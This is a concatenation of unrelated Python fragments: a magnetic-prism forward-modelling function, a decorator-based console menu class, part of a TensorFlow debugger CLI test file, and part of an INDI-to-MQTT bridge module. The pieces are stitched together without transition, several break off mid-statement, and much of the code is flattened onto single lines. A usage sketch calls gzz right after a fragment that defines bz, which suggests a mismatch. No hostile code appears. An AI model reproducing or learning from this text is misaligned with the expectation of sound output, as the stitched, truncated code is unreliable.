mz] or None A magnetization vector. If not None, will use this value instead of the ``'magnetization'`` property of the prisms. Use this, e.g., for sensitivity matrix building. Returns: * bz: array The z component of the magnetic induction """ if xp.shape != yp.shape or xp.shape != zp.shape: raise ValueError("Input arrays xp, yp, and zp must have same shape!") if pmag is not None: mx, my, mz = pmag size = len(xp) res = numpy.zeros(size, dtype=numpy.float) for prism in prisms: if (prism is None or ('magnetization' not in prism.props and pmag is None)): continue if pmag is None: mx, my, mz = prism.props['magnetization'] x1, x2 = prism.x1, prism.x2 y1, y2 = prism.y1, prism.y2 z1, z2 = prism.z1, prism.z2 _prism.bz(xp, yp, zp,
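# A minimal usage sketch for the forward modelling functions above (assumption: this
# module is used alongside fatiando.mesher; the prism geometry, density and observation
# point are illustrative values in SI units):
import numpy as np
from fatiando.mesher import Prism
model = [Prism(-500, 500, -500, 500, 100, 600, {'density': 1000.0})]
xp, yp, zp = np.array([0.0]), np.array([0.0]), np.array([-10.0])
print(gzz(xp, yp, zp, model))  # vertical gravity gradient at the point, in Eotvos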
import pandas as pd import numpy as np # makes multiple instances of the object available. from logistics.plugins.metaclass import Meta # imports all data types. from logistics.plugins.types import * # stores menu options over functions and class methods for listing. class Record(metaclass = Meta): # initializes the object and function it is decorating. def __init__( self, ) -> ReturnType: self.basic_menu : ListType = [] self.descriptive_menu : ListType = [] self.dictionary_menu : DictionaryType = {} self.individual_dict : DictionaryType = {} self.reset_dict : DictionaryType = {} self.poolsize : IntegerType = 0 self.stored_keys : ListType = [] self.print_val_dict : DictionaryType = {} self.hidden_basic_menu : ListType = [] self.hidden_descriptive_menu : ListType = [] self.hidden_dictionary_menu : DictionaryType = {} self.contains_autoinit : BooleanType = False # option_name - stores the name for the config and display functions. # option_description - stores the description of the function for the config and display functions. # autoinit (True/False) - automatically initializes the function without storing into the dictionary menu. # print_val (True/False) - enables the print of function output. # - # creates an entry that is stored in a basic menu, descriptive menu and a dictionary menu. # DEFAULT: record.entry(option_name, option_description = '', autoinit = False, print_val = False). def entry( self, option_name : StringType = '', option_description : StringType = '', autoinit: BooleanType = False, print_val: BooleanType = False, ) -> StringDictionary: self.option_name = option_name self.option_description = option_description self.dict_name = self.option_name self.print_val = print_val self.individual_dict[self.dict_name] = {} self.reset_dict[self.dict_name] = {} self.print_val_dict[self.option_name] = self.print_val def record_function(func): if autoinit == False: self.dictionary_menu[self.option_name] = func self.basic_menu += [self.option_name] self.descriptive_function = str(self.option_name) + ' - ' + str(self.option_description) self.descriptive_menu += [self.descriptive_function] elif autoinit == True: self.hidden_dictionary_menu[self.option_name] = func self.hidden_basic_menu += [self.option_name] self.descriptive_function = str(self.option_name) + ' - ' + str(self.option_description) self.hidden_descriptive_menu += [self.descriptive_function] self.contains_autoinit = True def _wrap(*args, **kwargs): return func(*args, **kwargs) return _wrap return record_function # style ('decorator' - appends to a function.) # style ('function' - executes as a standalone function.) # method ('basic' - shows just record.entry stored names.) # method ('descriptive' - shows record.entry stored names and record.entry.option_description as a help menu.) # method ('dictionary' - creates a dictionary of record.entry names and the function they are appended on.) # return_option ('logs' - executes the function, but returns logs.) # return_option ('function' - shows logs, but returns the function.) # - # outputs saved menu as a function or decorator. # DEFAULT: record.display(style = 'decorator', method = 'dictionary', return_option = 'logs').
def display( self, style : StringType = 'decorator', method : StringType = 'dictionary', return_option : StringType = 'logs', ) -> StringDictionary: if style == 'decorator': if return_option == 'logs': if method == 'basic': def wrapper(func): def decorator(self,*args, **kwargs): func(*args, **kwargs) return self.basic_menu return decorator return wrapper elif method == 'descriptive': def wrapper(func): def decorator(self,*args, **kwargs): func(*args, **kwargs) return self.descriptive_menu return decorator return wrapper elif method == 'dictionary': def wrapper(func): def decorator(self, *args, **kwargs): func(*args, **kwargs) return self.dictionary_menu return decorator return wrapper elif return_option == 'function': if method == 'basic': def wrapper(func): def decorator(self, *args, **kwargs): print(self.basic_menu) return func(*args, **kwargs) return decorator return wrapper elif method == 'descriptive': def wrapper(func): def decorator(self, *args, **kwargs): print(self.descriptive_menu) return func(*args, **kwargs) return decorator return wrapper elif method == 'dictionary': def wrapper(func): def decorator(self, *args, **kwargs): print(self.dictionary_menu) return func(*args, **kwargs) return decorator return wrapper elif style == 'function': if method == 'basic': return self.basic_menu elif method == 'descriptive': return self.descriptive_menu elif method == 'dictionary': return self.dictionary_menu # type ('static' - adapts to the execution of static non-self methods and functions.) # type ('dynamic' - adapts to the execution of dynamic class self methods and functions.) # display_headline - displays the desired headline. # display_message - displays input value message. # output_message - confirmation of the chosen value. # method ('descriptive' - shows stored option_name and it's description.) # method ('basic' - shows only the stored option_name.) # alignment ('basic' - shows all stored option_name and option_description values in a row.) # alignment ('newline' -shows all stored option_name and option_description values in a new line.) # queue (True/False) - enables stacking of functions and executing them in a chain. # show_dtypes (True/False) - shows the dtype of the input value. # - # creates an executeable menu from defined entries on top of functions. # DEFAULT: record.config(type = 'static', display_headline ='AVAILABLE OPTIONS', display_message = 'ENTER THE OPTION: ', output_message = 'YOU HAVE CHOSEN: ', method = 'descriptive', alignment = 'newline', queue = False, show_dtypes = True). def config( self, type : StringType = 'static', display_headline : StringType ='AVAILABLE OPTIONS', display_message : StringType = 'ENTER THE OPTION: ', output_message : StringType = 'YOU HAVE CHOSEN: ', method : StringType = 'descriptive', alignment : StringType = 'newline', queue: BooleanType = False, show_dtypes: BooleanType = True, ) -> DictionaryType: self.display_headline = display_headline self.display_message = display_message self.output_message = output_message self.queue = queue self.show_dtypes = show_dtypes self.yield_name = 0 # list item counter that enables iterating through the list. # assert type. 
if type != 'static' and type != 'dynamic': type = 'static' print('WARNING: Automatically forced type to static due to invalid type choice.') print('Write type = \'static\' or type = \'dynamic\' in the config option to change how this impacts the behaviour of executed functions in the menu.') print('') if alignment == 'basic': if method == 'basic': show_menu = self.display(style = 'function', method = 'basic') print(self.display_headline) print('-----------------') print(show_menu) elif method == 'descriptive': show_menu = self.display(style = 'function', method = 'descriptive') print(self.display_headline) print('-----------------') print(show_menu) else: print('INVALID METHOD CHOSEN, THE PROGRAM WILL CONTINUE WITHOUT DISPLAYED OPTIONS.\n') elif alignment == 'newline': if method == 'basic': show_menu = self.display(style = 'function', method = 'basic') print(self.display_headline) print('-----------------') for line in show_menu: print(line) elif method == 'descriptive': show_menu = self.display(style = 'function', method = 'descriptive') print(self.display_headline) print('-----------------') for line in show_menu: print(line) else: print('INVALID METHOD CHOSEN, THE PROGRAM WILL CONTINUE WITHOUT DISPLAYED OPTIONS.\n') if queue == False: self.option = input('\n' + self.display_message) self.print_option = self.print_val_dict[self.option] print(self.output_message, self.option + '\n') # executes autoinit function. if self.contains_autoinit == True: try: for i in self.hidden_dictionary_menu: self.hidden_dictionary_menu[i](self) except: for i in self.hidden_dictionary_menu: self.hidden_dictionary_menu[i]() if type == 'static': try: if self.print_option == False: return self.dictionary_menu[self.option](self) else: return print(self.dictionary_menu[self.option](self)) except: if self.print_option == False: return self.dictionary_menu[self.option]() else: return print(self.dictionary_menu[self.option]()) elif type == 'dynamic': try: return self.dictionary_menu[self.option]() except: return self.dictionary_menu[self.option](self) if queue == True: # executes autoinit functions. if self.contains_autoinit == True: try: for i in self.hidden_dictionary_menu: self.hidden_dictionary_menu[i](self) except: for i in self.hidden_dictionary_menu: self.hidden_dictionary_menu[i]() # enables a loop to execute functions in a chain.
self.queue_handler() if type == 'static': print(self.tmp_name_list[self.yield_name]) for tmp_func in self.tmp_list: self.clone_dict = self.tmp_name_list[self.yield_name] self.print_option = self.tmp_print_list[self.yield_name] print(self.tmp_name_list[self.yield_name]) self.redefine() try: if self.print_option == False: tmp_func(self, **self.individual_dict[self.clone_dict]) print('') self.yield_name += 1 else: print(tmp_func(self, **self.individual_dict[self.clone_dict])) print('') self.yield_name += 1 except: if self.print_option == False: tmp_func(**self.individual_dict[self.clone_dict]) print('') self.yield_name += 1 else: print(tmp_func(**self.individual_dict[self.clone_dict])) print('') self.yield_name += 1 elif type == 'dynamic': for tmp_func in self.tmp_list: self.clone_dict = self.tmp_name_list[self.yield_name] self.print_option = self.tmp_print_list[self.yield_name] print(self.tmp_name_list[self.yield_name]) self.redefine() try: if self.print_option == False: tmp_func(**self.individual_dict[self.clone_dict]) print('') self.yield_name += 1 else: print(tmp_func(**self.individual_dict[self.clone_dict])) print('') self.yield_name += 1 except: if self.print_option == False: tmp_func(self, **self.individual_dict[self.clone_dict]) print('') self.yield_name += 1 else: print(tmp_func(self, **self.individual_dict[self.clone_dict])) print('') self.yield_name += 1 return # variable - name of the function argument input is being passed as. # type - type of the data being passed ('int', 'float', 'str', 'bool', 'list', 'tuple', 'dict' and 'vector' supported). # - # function that stores the input value in a dictionary. def store(self, variable, type): self.type = type self.variable = variable self.individual_dict[self.dict_name][self.variable] = self.type self.reset_dict[self.dict_name][self.variable] = self.type return self.dict_name # function that casts an input of a certain data type and formats it before sending as a function argument. def redefine(self): if self.show_dtypes == True: print(self.reset_dict) for i in self.individual_dict[self.clone_dict]: self.format = self.reset_dict[self.clone_dict][i] if self.format != 'list': self.new_i = input(f'Enter the {i}:
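# Hedged usage sketch (added for illustration; not part of the original source).
# Shows how the Record entry/config API above might be used on plain functions,
# assuming the class is importable as shown and behaves as documented in its
# comments.
def _example_record_menu():
    record = Record()

    @record.entry(option_name='greet', option_description='Print a greeting.',
                  print_val=True)
    def greet():
        return 'hello'

    @record.entry(option_name='version', option_description='Show the version string.',
                  print_val=True)
    def version():
        return '1.0.0'

    # For entries whose functions take arguments, record.store() would be called
    # right after the corresponding entry to declare each argument's name and
    # type, and the menu would be run with config(queue=True) so redefine() can
    # prompt for the values.
    record.config(type='static', method='descriptive', alignment='newline')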
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests of the Analyzer CLI Backend.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import os import tempfile import numpy as np from six.moves import xrange # pylint: disable=redefined-builtin from tensorflow.core.protobuf import config_pb2 from tensorflow.core.protobuf import rewriter_config_pb2 from tensorflow.python.client import session from tensorflow.python.debug.cli import analyzer_cli from tensorflow.python.debug.cli import cli_config from tensorflow.python.debug.cli import cli_shared from tensorflow.python.debug.cli import cli_test_utils from tensorflow.python.debug.cli import command_parser from tensorflow.python.debug.cli import debugger_cli_common from tensorflow.python.debug.lib import debug_data from tensorflow.python.debug.lib import debug_utils from tensorflow.python.debug.lib import source_utils from tensorflow.python.framework import constant_op from tensorflow.python.framework import test_util from tensorflow.python.lib.io import file_io from tensorflow.python.ops import array_ops from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops import variables from tensorflow.python.platform import googletest from tensorflow.python.platform import test from tensorflow.python.util import tf_inspect # Helper function to accommodate MKL-enabled TensorFlow: # MatMul op is supported by MKL and its name is prefixed with "_Mkl" during the # MKL graph rewrite pass. def _matmul_op_name(): return "_MklMatMul" if test_util.IsMklEnabled() else "MatMul" def _cli_config_from_temp_file(): return cli_config.CLIConfig( config_file_path=os.path.join(tempfile.mkdtemp(), ".tfdbg_config")) def no_rewrite_session_config(): rewriter_config = rewriter_config_pb2.RewriterConfig( disable_model_pruning=True, constant_folding=rewriter_config_pb2.RewriterConfig.OFF, arithmetic_optimization=rewriter_config_pb2.RewriterConfig.OFF, dependency_optimization=rewriter_config_pb2.RewriterConfig.OFF, pin_to_host_optimization=rewriter_config_pb2.RewriterConfig.OFF) graph_options = config_pb2.GraphOptions(rewrite_options=rewriter_config) return config_pb2.ConfigProto(graph_options=graph_options) def line_number_above(): return tf_inspect.stack()[1][2] - 1 def parse_op_and_node(line): """Parse a line containing an op node followed by a node name. For example, if the line is " [Variable] hidden/weights", this function will return ("Variable", "hidden/weights") Args: line: The line to be parsed, as a str. Returns: Name of the parsed op type. Name of the parsed node. """ op_type = line.strip().split(" ")[0].replace("[", "").replace("]", "") # Not using [-1], to tolerate any other items that might be present behind # the node name. 
node_name = line.strip().split(" ")[1] return op_type, node_name def assert_column_header_command_shortcut(tst, command, reverse, node_name_regex, op_type_regex, tensor_filter_name): tst.assertFalse(reverse and "-r" in command) tst.assertFalse(not(op_type_regex) and ("-t %s" % op_type_regex) in command) tst.assertFalse( not(node_name_regex) and ("-t %s" % node_name_regex) in command) tst.assertFalse( not(tensor_filter_name) and ("-t %s" % tensor_filter_name) in command) def assert_listed_tensors(tst, out, expected_tensor_names, expected_op_types, node_name_regex=None, op_type_regex=None, tensor_filter_name=None, sort_by="timestamp", reverse=False): """Check RichTextLines output for list_tensors commands. Args: tst: A test_util.TensorFlowTestCase instance. out: The RichTextLines object to be checked. expected_tensor_names: (list of str) Expected tensor names in the list. expected_op_types: (list of str) Expected op types of the tensors, in the same order as the expected_tensor_names. node_name_regex: Optional: node name regex filter. op_type_regex: Optional: op type regex filter. tensor_filter_name: Optional: name of the tensor filter. sort_by: (str) (timestamp | op_type | tensor_name) the field by which the tensors in the list are sorted. reverse: (bool) whether the sorting is in reverse (i.e., descending) order. """ line_iter = iter(out.lines) attr_segs = out.font_attr_segs line_counter = 0 num_dumped_tensors = int(next(line_iter).split(" ")[0]) line_counter += 1 tst.assertGreaterEqual(num_dumped_tensors, len(expected_tensor_names)) if op_type_regex is not None: tst.assertEqual("Op type regex filter: \"%s\"" % op_type_regex, next(line_iter)) line_counter += 1 if node_name_regex is not None: tst.assertEqual("Node name regex filter: \"%s\"" % node_name_regex, next(line_iter)) line_counter += 1 tst.assertEqual("", next(line_iter)) line_counter += 1 # Verify the column heads "t (ms)", "Op type" and "Tensor name" are present. line = next(line_iter) tst.assertIn("t (ms)", line) tst.assertIn("Op type", line) tst.assertIn("Tensor name", line) # Verify the command shortcuts in the top row. 
attr_segs = out.font_attr_segs[line_counter] attr_seg = attr_segs[0] tst.assertEqual(0, attr_seg[0]) tst.assertEqual(len("t (ms)"), attr_seg[1]) command = attr_seg[2][0].content tst.assertIn("-s timestamp", command) assert_column_header_command_shortcut( tst, command, reverse, node_name_regex, op_type_regex, tensor_filter_name) tst.assertEqual("bold", attr_seg[2][1]) idx0 = line.index("Size") attr_seg = attr_segs[1] tst.assertEqual(idx0, attr_seg[0]) tst.assertEqual(idx0 + len("Size (B)"), attr_seg[1]) command = attr_seg[2][0].content tst.assertIn("-s dump_size", command) assert_column_header_command_shortcut(tst, command, reverse, node_name_regex, op_type_regex, tensor_filter_name) tst.assertEqual("bold", attr_seg[2][1]) idx0 = line.index("Op type") attr_seg = attr_segs[2] tst.assertEqual(idx0, attr_seg[0]) tst.assertEqual(idx0 + len("Op type"), attr_seg[1]) command = attr_seg[2][0].content tst.assertIn("-s op_type", command) assert_column_header_command_shortcut( tst, command, reverse, node_name_regex, op_type_regex, tensor_filter_name) tst.assertEqual("bold", attr_seg[2][1]) idx0 = line.index("Tensor name") attr_seg = attr_segs[3] tst.assertEqual(idx0, attr_seg[0]) tst.assertEqual(idx0 + len("Tensor name"), attr_seg[1]) command = attr_seg[2][0].content tst.assertIn("-s tensor_name", command) assert_column_header_command_shortcut( tst, command, reverse, node_name_regex, op_type_regex, tensor_filter_name) tst.assertEqual("bold", attr_seg[2][1]) # Verify the listed tensors and their timestamps. tensor_timestamps = [] dump_sizes_bytes = [] op_types = [] tensor_names = [] for line in line_iter: items = line.split(" ") items = [item for item in items if item] rel_time = float(items[0][1:-1]) tst.assertGreaterEqual(rel_time, 0.0) tensor_timestamps.append(rel_time) dump_sizes_bytes.append(command_parser.parse_readable_size_str(items[1])) op_types.append(items[2]) tensor_names.append(items[3]) # Verify that the tensors should be listed in ascending order of their # timestamps. if sort_by == "timestamp": sorted_timestamps = sorted(tensor_timestamps) if reverse: sorted_timestamps.reverse() tst.assertEqual(sorted_timestamps, tensor_timestamps) elif sort_by == "dump_size": sorted_dump_sizes_bytes = sorted(dump_sizes_bytes) if reverse: sorted_dump_sizes_bytes.reverse() tst.assertEqual(sorted_dump_sizes_bytes, dump_sizes_bytes) elif sort_by == "op_type": sorted_op_types = sorted(op_types) if reverse: sorted_op_types.reverse() tst.assertEqual(sorted_op_types, op_types) elif sort_by == "tensor_name": sorted_tensor_names = sorted(tensor_names) if reverse: sorted_tensor_names.reverse() tst.assertEqual(sorted_tensor_names, tensor_names) else: tst.fail("Invalid value in sort_by: %s" % sort_by) # Verify that the tensors are all listed. for tensor_name, op_type in zip(expected_tensor_names, expected_op_types): tst.assertIn(tensor_name, tensor_names) index = tensor_names.index(tensor_name) tst.assertEqual(op_type, op_types[index]) def assert_node_attribute_lines(tst, out, node_name, op_type, device, input_op_type_node_name_pairs, ctrl_input_op_type_node_name_pairs, recipient_op_type_node_name_pairs, ctrl_recipient_op_type_node_name_pairs, attr_key_val_pairs=None, num_dumped_tensors=None, show_stack_trace=False, stack_trace_available=False): """Check RichTextLines output for node_info commands. Args: tst: A test_util.TensorFlowTestCase instance. out: The RichTextLines object to be checked. node_name: Name of the node. op_type: Op type of the node, as a str. device: Name of the device on which the node resides. 
input_op_type_node_name_pairs: A list of 2-tuples of op type and node name, for the (non-control) inputs to the node. ctrl_input_op_type_node_name_pairs: A list of 2-tuples of op type and node name, for the control inputs to the node. recipient_op_type_node_name_pairs: A list of 2-tuples of op type and node name, for the (non-control) output recipients to the node. ctrl_recipient_op_type_node_name_pairs: A list of 2-tuples of op type and node name, for the control output recipients to the node. attr_key_val_pairs: Optional: attribute key-value pairs of the node, as a list of 2-tuples. num_dumped_tensors: Optional: number of tensor dumps from the node. show_stack_trace: (bool) whether the stack trace of the node's construction is asserted to be present. stack_trace_available: (bool) whether Python stack trace is available. """ line_iter = iter(out.lines) tst.assertEqual("Node %s" % node_name, next(line_iter)) tst.assertEqual("", next(line_iter)) tst.assertEqual(" Op: %s" % op_type, next(line_iter)) tst.assertEqual(" Device: %s" % device, next(line_iter)) tst.assertEqual("", next(line_iter)) tst.assertEqual(" %d input(s) + %d control input(s):" % (len(input_op_type_node_name_pairs), len(ctrl_input_op_type_node_name_pairs)), next(line_iter)) # Check inputs. tst.assertEqual(" %d input(s):" % len(input_op_type_node_name_pairs), next(line_iter)) for op_type, node_name in input_op_type_node_name_pairs: tst.assertEqual(" [%s] %s" % (op_type, node_name), next(line_iter)) tst.assertEqual("", next(line_iter)) # Check control inputs. if ctrl_input_op_type_node_name_pairs: tst.assertEqual(" %d control input(s):" % len(ctrl_input_op_type_node_name_pairs), next(line_iter)) for op_type, node_name in ctrl_input_op_type_node_name_pairs: tst.assertEqual(" [%s] %s" % (op_type, node_name), next(line_iter)) tst.assertEqual("", next(line_iter)) tst.assertEqual(" %d recipient(s) + %d control recipient(s):" % (len(recipient_op_type_node_name_pairs), len(ctrl_recipient_op_type_node_name_pairs)), next(line_iter)) # Check recipients, the order of which is not deterministic. tst.assertEqual(" %d recipient(s):" % len(recipient_op_type_node_name_pairs), next(line_iter)) t_recs = [] for _ in recipient_op_type_node_name_pairs: line = next(line_iter) op_type, node_name = parse_op_and_node(line) t_recs.append((op_type, node_name)) tst.assertItemsEqual(recipient_op_type_node_name_pairs, t_recs) # Check control recipients, the order of which is not deterministic. if ctrl_recipient_op_type_node_name_pairs: tst.assertEqual("", next(line_iter)) tst.assertEqual(" %d control recipient(s):" % len(ctrl_recipient_op_type_node_name_pairs), next(line_iter)) t_ctrl_recs = [] for _ in ctrl_recipient_op_type_node_name_pairs: line = next(line_iter) op_type, node_name = parse_op_and_node(line) t_ctrl_recs.append((op_type, node_name)) tst.assertItemsEqual(ctrl_recipient_op_type_node_name_pairs, t_ctrl_recs) # The order of multiple attributes can be non-deterministic. 
if attr_key_val_pairs: tst.assertEqual("", next(line_iter)) tst.assertEqual("Node attributes:", next(line_iter)) kv_pairs = [] for key, val in attr_key_val_pairs: key = next(line_iter).strip().replace(":", "") val = next(line_iter).strip() kv_pairs.append((key, val)) tst.assertEqual("", next(line_iter)) if num_dumped_tensors is not None: tst.assertEqual("%d dumped tensor(s):" % num_dumped_tensors, next(line_iter)) tst.assertEqual("", next(line_iter)) dump_timestamps_ms = [] for _ in xrange(num_dumped_tensors): line = next(line_iter) tst.assertStartsWith(line.strip(), "Slot 0 @ DebugIdentity @") tst.assertTrue(line.strip().endswith(" ms")) dump_timestamp_ms = float(line.strip().split(" @ ")[-1].replace("ms", "")) tst.assertGreaterEqual(dump_timestamp_ms, 0.0) dump_timestamps_ms.append(dump_timestamp_ms) tst.assertEqual(sorted(dump_timestamps_ms), dump_timestamps_ms) if show_stack_trace: tst.assertEqual("", next(line_iter)) tst.assertEqual("", next(line_iter)) tst.assertEqual("Traceback of node construction:", next(line_iter)) if stack_trace_available: try: depth_counter = 0 while True: for i in range(5): line = next(line_iter) if i == 0: tst.assertEqual(depth_counter, int(line.split(":")[0])) elif i == 1: tst.assertStartsWith(line, " Line:") elif i == 2: tst.assertStartsWith(line, " Function:") elif i == 3: tst.assertStartsWith(line, " Text:") elif i == 4: tst.assertEqual("", line) depth_counter += 1
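# Hedged illustration (added; not part of the original test file). The helper
# parse_op_and_node() defined above splits a rendered list_tensors/node_info
# line into its op type and node name, exactly as its docstring describes:
def _example_parse_op_and_node():
    op_type, node_name = parse_op_and_node("  [Variable] hidden/weights")
    assert op_type == "Variable"
    assert node_name == "hidden/weights"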
# indi_mr/i_to_m.py """Defines blocking function inditomqtt: Receives XML data from indiserver on port 7624 and publishes it via MQTT. Receives data from MQTT and sends it to indiserver on port 7624. """ import sys, collections, threading, asyncio from time import sleep from datetime import datetime import xml.etree.ElementTree as ET from . import toindi, fromindi, tools MQTT_AVAILABLE = True try: import paho.mqtt.client as mqtt except ImportError: MQTT_AVAILABLE = False # _STARTTAGS is a tuple of ( b'<defTextVector', ... ) data received will be tested to start with such a starttag _STARTTAGS = tuple(b'<' + tag for tag in fromindi.TAGS) # _ENDTAGS is a tuple of ( b'</defTextVector>', ... ) data received will be tested to end with such an endtag _ENDTAGS = tuple(b'</' + tag + b'>' for tag in fromindi.TAGS) ### MQTT Handlers for inditomqtt def _inditomqtt_on_message(client, userdata, message): "Callback when an MQTT message is received" if message.topic == userdata["pubsnoopcontrol"]: # The message received on the snoop control topic is one this device has transmitted, ignore it return # On receiving a getProperties on snoop_control/#, check the device name and property to be snooped if message.topic.startswith(userdata["snoop_control_topic"]+"/"): try: root = ET.fromstring(message.payload.decode("utf-8")) except Exception: # possibly malformed return if root.tag != "getProperties": # only getProperties is listened for on snoop_control_topic return devicename = root.get("device") propertyname = root.get("name") if propertyname and (not devicename): # illegal return snooptopic, remote_mqtt_id = message.topic.split("/", maxsplit=1) if not devicename: # It's a snoop everything request userdata["sendsnoopall"].add(remote_mqtt_id) elif not propertyname: # It's a snoop device request sendsnoopdevices = userdata["sendsnoopdevices"] if devicename in sendsnoopdevices: sendsnoopdevices[devicename].add(remote_mqtt_id) else: sendsnoopdevices[devicename] = set((remote_mqtt_id,)) else: # It's a snoop device/property request sendsnoopproperties = userdata["sendsnoopproperties"] if (devicename,propertyname) in sendsnoopproperties: sendsnoopproperties[devicename,propertyname].add(remote_mqtt_id) else: sendsnoopproperties[devicename,propertyname] = set((remote_mqtt_id,)) if message.payload.startswith(b"delProperty"): try: root = ET.fromstring(message.payload.decode("utf-8")) except Exception: # possibly malformed return _remove(root, userdata) # we have received a message from the mqtt server, put it into the data_to_indi buffer userdata['data_to_indi'].append(message.payload) def _inditomqtt_on_connect(client, userdata, flags, rc): "The callback for when the client receives a CONNACK response from the MQTT server, renew subscriptions" userdata['data_to_indi'].clear() # start with a fresh empty data_to_indi buffer if rc == 0: userdata['comms'] = True # Subscribing in on_connect() means that if we lose the connection and # reconnect then subscriptions will be renewed.
if userdata["subscribe_list"]: # subscribe to those remote id's listed subscribe_list = list((userdata["to_indi_topic"] + "/" + remote_id, 2) for remote_id in userdata["subscribe_list"] ) # gives a list of [(topic1,2),(topic2,2),(topic3,2)] client.subscribe( subscribe_list ) else: # subscribe to all remote id's client.subscribe( userdata["to_indi_topic"] + "/#", 2 ) # Every device subscribes to snoop_control/# being the snoop_control topic and all subtopics client.subscribe( userdata["snoopcontrol"], 2 ) # and to snoop_data/mqtt_id client.subscribe( userdata["snoopdata"], 2 ) # Finally, send a getProperties to all devices, so they refresh data userdata['data_to_indi'].append(b"<getProperties version=\"1.7\" />") print(f"""MQTT connected""") else: userdata['comms'] = False def _inditomqtt_on_disconnect(client, userdata, rc): "The MQTT client has disconnected, set userdata['comms'] = False, and clear out any data hanging about in data_to_indi" userdata['comms'] = False userdata['data_to_indi'].clear() def _sendtomqtt(payload, topic, mqtt_client): "Gets data which has been received from indi, and transmits to mqtt" result = mqtt_client.publish(topic=topic, payload=payload, qos=2) result.wait_for_publish() class _PortHandler: def __init__(self, loop, userdata, mqtt_client, indiserver): "Sets the userdata" self.userdata = userdata self.loop = loop self.mqtt_client = mqtt_client self.indiserver = indiserver self.topic = userdata["from_indi_topic"] + "/" + userdata["mqtt_id"] self.snoop_data_topic = userdata["snoop_data_topic"] + "/" # this will always have a remote mqtt_id appended self.data_to_indi = userdata['data_to_indi'] self.deviceset = userdata['deviceset'] self.sendsnoopall = userdata["sendsnoopall"] self.sendsnoopdevices = userdata["sendsnoopdevices"] self.sendsnoopproperties = userdata["sendsnoopproperties"] async def handle_data(self): reader, writer = await asyncio.open_connection(self.indiserver.host,self.indiserver.port) _message(self.topic, self.mqtt_client, f"Connected to {self.indiserver.host}:{self.indiserver.port}") await asyncio.gather(self.txtoindi(writer), self.rxfromindi(reader)) async def txtoindi(self, writer): "Pop message from data_to_indi deque, and write it to the port connection" while True: if self.data_to_indi: # Send the next message to the indiserver to_indi = self.data_to_indi.popleft() writer.write(to_indi) await writer.drain() else: # no message to send, do an async pause await asyncio.sleep(0.5) async def rxfromindi(self, reader): """get data received from the port connection, and call _sendtomqtt to send it to MQTT checks if the data received is to be sent to a snooping device, if so, send it""" message = b'' messagetagnumber = None while True: # get blocks of data from the indiserver try: data = await reader.readuntil(separator=b'>') except asyncio.LimitOverrunError: data = await reader.read(n=32000) if not message: # data is expected to start with <tag, first strip any newlines data = data.strip() for index, st in enumerate(_STARTTAGS): if data.startswith(st): messagetagnumber = index break else: # check if data received is a b'<getProperties ... 
/>' snooping request if data.startswith(b'<getProperties '): # send a snoop request on topic snoop_control/mqtt_id where mqtt_id is its own id result = await self.loop.run_in_executor(None, _sendtomqtt, data, self.userdata["pubsnoopcontrol"], self.mqtt_client) # data is either a getProperties, or does not start with a recognised tag, so ignore it # and continue waiting for a valid message start continue # set this data into the received message message = data # either further children of this tag are coming, or maybe its a single tag ending in "/>" if message.endswith(b'/>'): # the message is complete, handle message here try: root = ET.fromstring(message.decode("utf-8")) except Exception: # possible malformed message = b'' messagetagnumber = None continue devicename = root.get("device") # Run '_sendtomqtt' in the default loop's executor: result = await self.loop.run_in_executor(None, _sendtomqtt, message, self.topic, self.mqtt_client) # check if this data it to be sent to snooping devices for mqtt_id in self.sendsnoopall: # these connections snoop everything snooptopic = self.snoop_data_topic + mqtt_id result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client) if devicename in self.deviceset: if devicename in self.sendsnoopdevices: # set of mqtt_id's which snoop this devicename for mqtt_id in self.sendsnoopdevices[devicename]: snooptopic = self.snoop_data_topic + mqtt_id result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client) propertyname = root.get("name") if propertyname: if (devicename,propertyname) in self.sendsnoopproperties: # set of mqtt_id's which snoop this devicename/propertyname for mqtt_id in self.sendsnoopproperties[devicename,propertyname]: snooptopic = self.snoop_data_topic + mqtt_id result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client) # and start again, waiting for a new message if devicename: self.deviceset.add(devicename) if root.tag == "delProperty": # remove this device/property from snooping records _remove(root, self.userdata) message = b'' messagetagnumber = None # and read either the next message, or the children of this tag continue # To reach this point, the message is in progress, with a messagetagnumber set # keep adding the received data to message, until an endtag is reached message += data if message.endswith(_ENDTAGS[messagetagnumber]): # the message is complete, handle message here try: root = ET.fromstring(message.decode("utf-8")) except Exception: # possible malformed message = b'' messagetagnumber = None continue devicename = root.get("device") # Run '_sendtomqtt' in the default loop's executor: result = await self.loop.run_in_executor(None, _sendtomqtt, message, self.topic, self.mqtt_client) # check if this data it to be sent to snooping devices for mqtt_id in self.sendsnoopall: # these connections snoop everything snooptopic = self.snoop_data_topic + mqtt_id result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client) if devicename in self.deviceset: if devicename in self.sendsnoopdevices: # set of mqtt_id's which snoop this devicename for mqtt_id in self.sendsnoopdevices[devicename]: snooptopic = self.snoop_data_topic + mqtt_id result = await self.loop.run_in_executor(None, _sendtomqtt, message, snooptopic, self.mqtt_client) propertyname = root.get("name") if propertyname: if (devicename,propertyname) in self.sendsnoopproperties: # set of mqtt_id's which snoop this 
